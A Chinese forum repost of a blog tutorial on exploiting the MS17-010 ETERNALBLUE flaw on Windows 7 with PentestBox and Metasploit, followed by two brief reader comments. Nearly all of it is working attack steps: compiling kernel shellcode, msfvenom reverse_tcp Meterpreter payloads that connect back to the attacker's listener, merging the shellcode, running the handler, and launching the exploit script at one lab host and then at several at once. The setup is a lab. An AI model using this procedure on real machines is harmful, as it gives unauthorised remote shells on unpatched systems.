使用PentestBox工具利用ETERNALBLUE对Win7进行攻击，获取Meterpreter反弹

admin

转自：http://fuping.site/2017/08/16/HO ... LBLUE-ON-WINDOWS-7/

前言

MS17-010已经过去很久了，利用PentestBox的方式也提到过，但都是基于python2.6那种方式实现的。本文将使用Sleepya的脚本利用ETERNALBLUE来实现对Win7进行攻击，从而获取Meterpreter反弹。

靶机为Windows 7，IP为192.168.131.133。攻击机为Win10系统，安装了PentestBox，IP为192.168.217.1。
脚本下载地址：https://github.com/worawit/MS17-010

漏洞利用测试1.安装NASM

下载地址：http://www.nasm.us/pub/nasm/releasebuilds/ ，我这里用的是2.13。
然后开始安装。

[/url]

安装完成后加入环境变量。

2.下载利用脚本，并编译内核shellcode

1. git clone [url]https://github.com/worawit/MS17-010[/url]
   

复制代码

[url=http://fuping.site/2017/08/16/HOW-TO-USE-PENTESTBOX-TO-EXPLOIT-ETERNALBLUE-ON-WINDOWS-7/%E4%B8%8B%E8%BD%BD%E8%84%9A%E6%9C%AC.jpg]

编译内核shellcode

1. cd MS17-010/shellcode/
   
2. nasm -f bin eternalblue_kshellcode_x64.asm
   
3. nasm -f bin eternalblue_kshellcode_x86.asm
   

复制代码

[/url]

3.生成反弹exp

1. msfvenom -p windows/meterpreter/reverse_tcp  EXITFUNC=thread LHOST=192.168.217.1 LPORT=4445 -f raw -o ../../Git/MS17-010/shellcode/sc_x86_msf.bin
   
2. msfvenom -p windows/x64/meterpreter/reverse_tcp  EXITFUNC=thread LHOST=192.168.217.1 LPORT=4444 -f raw -o ../../Git/MS17-010/shellcode/sc_x64_msf.bin

复制代码

[url=http://fuping.site/2017/08/16/HOW-TO-USE-PENTESTBOX-TO-EXPLOIT-ETERNALBLUE-ON-WINDOWS-7/%E7%94%9F%E6%88%90%E5%8F%8D%E5%BC%B9exp.jpg]

4.合并SHELLCODE

1. cat eternalblue_kshellcode_x64 sc_x64_msf.bin > sc_x64.bin
   
2. cat eternalblue_kshellcode_x86 sc_x86_msf.bin > sc_x86.bin
   
3. python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
   

复制代码

[/url]

5.开启Metasploit并监听

1. msf > use exploit/multi/handler
   
2. msf exploit(handler) > set ExitOnSession false
   
3. msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
   
4. msf exploit(handler) > set EXITFUNC thread
   
5. msf exploit(handler) > set LHOST 192.168.217.1
   
6. msf exploit(handler) > set LPORT 4444
   
7. msf exploit(handler) > exploit -j
   
8. ...
   
9. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
   
10. msf exploit(handler) > set LPORT 4445
    
11. msf exploit(handler) > exploit -j

复制代码

[url=http://fuping.site/2017/08/16/HOW-TO-USE-PENTESTBOX-TO-EXPLOIT-ETERNALBLUE-ON-WINDOWS-7/%E5%BC%80%E5%90%AF%E7%9B%91%E5%90%AC.jpg]

6.进行攻击

1. python eternalblue_exploit7.py 192.168.131.133 shellcodesc_all.bin
   

复制代码

[/url]

[url=http://fuping.site/2017/08/16/HOW-TO-USE-PENTESTBOX-TO-EXPLOIT-ETERNALBLUE-ON-WINDOWS-7/%E6%94%BB%E5%87%BB%E7%BB%93%E6%9E%9C.jpg]
看到已经获取Meterpreter反弹。

遇到的问题

在PentestBox中运行一些命令时(如msfconsole)，提示不是内部或外部命令，也不是可运行的程序或批处理文件。
解决方法：输入cmd之后再输入需要执行的命令。
[/url]

总结

1.这种方式利用稍微简单点，不需要过多的命令，而且生成的SHELLCODE也具有复用性。
2.在以上的操作中，均生成了32位和64位的shellcode，最后利用eternalblue_sc_merge脚本合并到一起。然后在Eternalblue漏洞中利用合并的shellcode可以支持x86和x64，无需再检测目标体系结构。
3.在使用中设置了线程，可以同时对多个系统进行攻击测试。
例如：

1. python eternalblue_exploit7.py 192.168.131.133 shellcodesc_all.bin
   
2. python eternalblue_exploit7.py 192.168.131.134 shellcodesc_all.bin
   
3. python eternalblue_exploit7.py 192.168.131.135 shellcodesc_all.bin
   
4. python eternalblue_exploit7.py 192.168.131.136 shellcodesc_all.bin
   

复制代码

[url=http://fuping.site/2017/08/16/HOW-TO-USE-PENTESTBOX-TO-EXPLOIT-ETERNALBLUE-ON-WINDOWS-7/%E5%A4%9A%E4%B8%AA%E6%94%BB%E5%87%BB.jpg]
攻击结果：
[/url]

参考

[1][url=https://github.com/worawit/MS17-010]https://github.com/worawit/MS17-010
[2]https://www.exploit-db.com/docs/42280.pdf

大圣

没什么意义的转过来还加了自己的水印。不懂站长

Joinxxc

PentestBox 里面的msf 可以升级到最新的版本么？？？？